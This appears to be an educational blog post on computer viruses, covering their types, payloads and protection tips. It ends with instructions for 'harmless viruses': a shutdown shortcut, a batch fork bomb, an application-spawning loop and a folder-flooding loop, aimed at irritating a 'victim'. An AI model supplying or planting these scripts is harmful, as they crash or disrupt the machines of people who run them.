What is a Computer Virus ?
Computer virus is nothing but a malicious piece of code which copies itself and has a drastic effect on our system. Such as corrupting files or system data, deleting files or destroying data. Designed to relentlessly replicate, computer viruses infect your programs and files, alter the way your computer operates or stop it from working altogether.
What does a Computer Virus do ?
Some computer viruses are programmed to harm your computer by damaging programs or deleting files. A computer virus might corrupt or delete data on your computer, use your email program to spread itself to other computers, or even erase everything on your hard disk. Others simply replicate themselves or flood a network with traffic, making it impossible to perform any internet activity. Even less harmful computer viruses can significantly disrupt your system’s performance, sapping computer memory and causing frequent computer crashes.
Some computer viruses are programmed to harm your computer by damaging programs or deleting files. A computer virus might corrupt or delete data on your computer, use your email program to spread itself to other computers, or even erase everything on your hard disk. Others simply replicate themselves or flood a network with traffic, making it impossible to perform any internet activity. Even less harmful computer viruses can significantly disrupt your system’s performance, sapping computer memory and causing frequent computer crashes.
Viruses can infect a number of different portions of the
computer’s operating and file system. These include:
System Sectors
Ø
System Sectors
Ø
Files
Ø
Macros
Ø
Companion Files
Ø
Directories (Cluster) Viruses
Ø
Batch Files
Ø
Source Code
Ø
Visual Basic Files
Ø
Screensaver
Ø
Vulnerabilities
How does a Computer Virus find me ?
# from removable media
# from downloads off the Internet
# from e-mail attachments
# Sharing music files,video files, greeting cards or funny images with other users.
# Visiting an infected Web site.
# Opening spam email or an email attachment.
# Downloading free games, toolbars, media players and other system utilities.
# Installing mainstream software applications without fully reading license agreements.
What
are the symptoms of a Computer Virus ?
Your computer may be infected if you recognize any of these
malware symptoms:
# Slow
computer performance
# Erratic
computer behavior
# Unexplained
data loss
# Frequent
computer crashes
A resident virus is a computer virus that stores itself within memory allowing it to infect other files even when the originally infected program has been terminated.This type of virus is a permanent which dwells in the RAM memory. From there it can overcome and interrupt all of the operations executed by the system: corrupting files and programs that are opened, closed, copied, renamed etc.
Types
of Virus
There
are many types of viruses and most of them can be described according to their
code. Some of them are :
1. Resident Viruses
Examples include: Randex, CMJ, Meve, and MrKlunky.
2. Multipartite Viruses
Multipartite viruses are distributed through infected media
and usually hide in the memory. Gradually, the virus moves to the boot sector
of the hard drive and infects executable files on the hard drive and later
across the computer system.
3. Direct Action Viruses
The main purpose of this virus is to replicate and take
action when it is executed. When a specific condition is met, the virus will go
into action and infect files in the directory or folder that it is in and in
directories that are specified in the AUTOEXEC.BAT file PATH. This batch file
is always located in the root directory of the hard disk and carries out
certain operations when the computer is booted.
4. Overwrite Viruses
Virus of this kind is characterized by the fact that it
deletes the information contained in the files that it infects, rendering them
partially or totally useless once they have been infected.
The only way to clean a file infected by an overwrite virus
is to delete the file completely, thus losing the original content.
Examples of this virus include: Way, Trj.Reboot,
Trivial.88.D.
5. Boot Virus
This type of virus affects the boot sector of a floppy or
hard disk. This is a crucial part of a disk, in which information on the disk
itself is stored together with a program that makes it possible to boot (start)
the computer from the disk.
The best way of avoiding boot viruses is to ensure that
floppy disks are write-protected and never start your computer with an unknown
floppy disk in the disk drive.
Examples of boot viruses include: Polyboot.B, AntiEXE.
6. Macro Virus
Macro viruses infect files that are created using certain
applications or programs that contain macros. These mini-programs make it
possible to automate series of operations so that they are performed as a
single action, thereby saving the user from having to carry them out one by
one.
Examples of macro viruses: Relax, Melissa.A, Bablas,
O97M/Y2K.
7. Directory Virus
Directory viruses change the paths that indicate the
location of a file. By executing a program (file with the extension .EXE or
.COM) which has been infected by a virus, you are unknowingly running the virus
program, while the original file and program have been previously moved by the
virus.
Once infected it becomes impossible to locate the original
files.
8. Polymorphic Virus
Polymorphic viruses encrypt or encode themselves in a
different way (using different algorithms and encryption keys) every time they
infect a system.
This makes it impossible for anti-viruses to find them using
string or signature searches (because they are different in each encryption)
and also enables them to create a large number of copies of themselves.
Examples include: Elkern, Marburg, Satan Bug, and Tuareg.
9. File Infectors
This type of virus infects programs or executable files
(files with an .EXE or .COM extension). When one of these programs is run,
directly or indirectly, the virus is activated, producing the damaging effects
it is programmed to carry out. The majority of existing viruses belongs to this
category, and can be classified depending on the actions that they carry out.
10. Encrypted Viruses
This type of viruses consists of encrypted malicious code,
decrypted module. The viruses use encrypted code technique which make antivirus
software hardly to detect them. The antivirus program usually can detect this
type of viruses when they try spread by decrypted themselves.
11. Companion Viruses
Companion viruses can be considered file infector viruses
like resident or direct action types. They are known as companion viruses
because once they get into the system they "accompany" the other
files that already exist. In other words, in order to carry out their infection
routines, companion viruses can wait in memory until a program is run (resident
viruses) or act immediately by making copies of themselves (direct action
viruses).
Some examples include: Stator, Asimov.1539, and Terrax.1069
12. Network Virus
Network viruses rapidly spread through a Local Network Area
(LAN), and sometimes throughout the internet. Generally, network viruses
multiply through shared resources, i.e., shared drives and folders. When the
virus infects a computer, it searches through the network to attack its new
potential prey. When the virus finishes infecting that computer, it moves on to
the next and the cycle repeats itself.
The most dangerous network viruses are Nimda and SQLSlammer.
13. Nonresident Viruses
This type of viruses is similar to Resident Viruses by using
replication of module. Besides that, Nonresident Viruses role as finder module
which can infect to files when it found one (it will select one or more files
to infect each time the module is executed).
14. Stealth Viruses
Stealth Viruses is some sort of viruses which try to trick
anti-virus software by intercepting its requests to the operating system. It
has ability to hide itself from some antivirus software programs. Therefore,
some antivirus program cannot detect them.
15. Sparse Infectors
In order to spread widely, a virus must attempt to avoid detection.
To minimize the probability of its being discovered a virus could use any
number of different techniques. It might, for example, only infect every 20th
time a file is executed; it might only infect files whose lengths are within
narrowly defined ranges or whose names begin with letters in a certain range of
the alphabet. There are many other possibilities.
16. Spacefiller (Cavity) Viruses
Many viruses take the easy way out when infecting files;
they simply attach themselves to the end of the file and then change the start
of the program so that it first points to the virus and then to the actual
program code. Many viruses that do this also implement some stealth techniques
so you don't see the increase in file length when the virus is active in memory.
A spacefiller (cavity) virus, on the other hand, attempts to
be clever. Some program files, for a variety of reasons, have empty space
inside of them. This empty space can be used to house virus code. A spacefiller
virus attempts to install itself in this empty space while not damaging the
actual program itself. An advantage of this is that the virus then does not
increase the length of the program and can avoid the need for some stealth
techniques. The Lehigh virus was an early example of a spacefiller virus.
17. FAT Virus
The file allocation table or FAT is the part of a disk used
to connect information and is a vital part of the normal functioning of the
computer.
This type of virus attack can be especially dangerous, by
preventing access to certain sections of the disk where important files are
stored. Damage caused can result in information losses from individual files or
even entire directories.
What
does a Payload mean ?
A payload refers to the component of a computer virus that
executes a malicious activity. Apart from the speed in which a virus spreads,
the threat level of a virus is calculated by the damages it causes. Viruses
with more powerful payloads tend to be more harmful.
Although not all viruses carry a payload, a few payloads are
considered extremely dangerous. Some of the examples of payloads are data
destruction, offensive messages and the delivery of spam emails through the
infected user's account.
Some viruses just copy themselves from one computer to
other. Other viruses may steal data or files, permit eavesdropping or
unauthorized access, destroy data and cause other consequences. It is also
possible for a virus to carry multiple payloads.
Payload is any action done by a program aside from the act
of spreading in itself. The payload of a virus or worm can range from
irreparably damaging the operating system or even the BIOS (as the CIH virus)
or almost nothing (as the Badtrans worm) or even something benevolent like
removing a malicious program (Sasser, YahaSux, Welchia). Sometimes a payload is
a consciously coded part of the program, as with the Ramen worm, or it could be
simply be a product of its existence and spreading, as with the Slammer worm.
Some of the ways to execute a payload include:
# By booting the computer using an infected removable
medium
# By opening an infected file
# By executing an infected program
# By activating a logic bomb
Arm
yourself against Computer Viruses
When you arm yourself with information and resources, you’re
wiser about computer security threats and less vulnerable to threat tactics.
Take these steps to safeguard your PC with the best computer virus protection:
1. Make sure that you have the best security software
products installed on your computer :
# Use antivirus protection and a firewall
# Get antispyware software
# Always keep your antivirus protection and antispyware
software up-to-date
# Update your operating system regularly
# Increase your browser security settings
# Avoid questionable Web sites
# Only download software from sites you trust. Carefully
evaluate free software and file sharing applications before downloading
them.
2. Practice safe email protocol :
# Don't open messages from unknown senders
# Immediately delete messages you suspect to be spam
# An unprotected computer is like an open door for
computer viruses.
# Firewalls monitor Internet traffic in and out of your
computer and hide your PC from online scammers looking for easy
targets.
# Products like Webroot Internet Security Essentials and
Webroot AntiVirus with Spy Sweeper provide complete protection from the
two most dangerous threats on the Internet spyware and computer
viruses.
# They thwart threats before they can enter your PC, stand
guard at every possible entrance of your computer and fend off any
computer virus that tries to enter, even the most damaging and devious
strains.
3. While free antivirus downloads are available, they just
can't offer the computer virus help you need keep up with the continuous
onslaught of new strains. Previously undetected forms of can often do the most
damage, so it’s critical to have up-to-the-minute, guaranteed antivirus
protection.
4. Small but insidious piece of programming-code that
attacks computer and network systems through 'contaminated' (infected) data
files, introduced into a system via disks or internet. As a digital equivalent
of biological microorganisms, it attaches itself to the target computer's
operating system or other programs, and automatically replicates itself to
spread to other computers or networks. Invented in 1960s as a prank, viruses
come in thousands of types and versions with new ones being invented every day,
each requiring a different cure (see antivirus and vaccine). While a few
viruses are harmless diversions, most are malicious and cause widespread and
severe damage and may bring down entire communication-networks or websites.
Some are immediately active, others remain latent for weeks or months, or work
slowly to avoid detection and cause destruction over long periods. Propagation
of computer viruses is a serious crime in many countries. See also Trojan
horse, and worm.
Let's
create some harmless viruses :p
1) Shutdown Virus
1.Right click (On Desktop)> new > shortcut
2.It will open a dialogue box , in that wizard it will ask
to type location of the item. Type :
shutdown.exe -s -t ## -c "**"
the ** is where you type what message you want to pop up
here, and leave the quotation marks up
the ## is where you type in how much time you want to give
before the computer shuts down
After you click next, type whatever name you want the file
to have there and then you can change it's folder look.
Your shutdown virus is ready to run :p
2) Fork Bomb
A Fork bomb is considered to be the smallest writable virus
in the batch language and it is capable of being annoying and if launched on a
home computer however on a server will probably result in a crash.
A fork bomb creates two instances which each create two
instances and so on…The processes recursively fork; this “forks” the processor
and jamm it completely until a crash occurs.
Here is how to make it.
Open up notepad and type:
%0|%0
and save it as fork.bat
Yep..its a virus of just 5 characters :P .
On double clicking this file,it will lead to total CPU jam
by opening about 500+ process of command prompt.
Once a successful fork bomb has activated in a system, one
may have to reboot to resume normal operation. Stopping a fork bomb requires
destroying all running instances of it.
3) Application
Bomber
Write the code below in notepad or any text editor and save
it with anyname but extension ".bat" and then double click it to run
it.
@echo off // It instructs to hide the commands when batch
files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications
like paint,notepad,command prompt repeatedly, irritating victim and ofcourse
affecting performance.
4) Folder flooder
Write the code below in notepad or any text editor and save
it with anyname but extension ".bat" and then double click it to run
it.
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive
no. randomly. So this code would make start creating folders whose name
can be any random number.
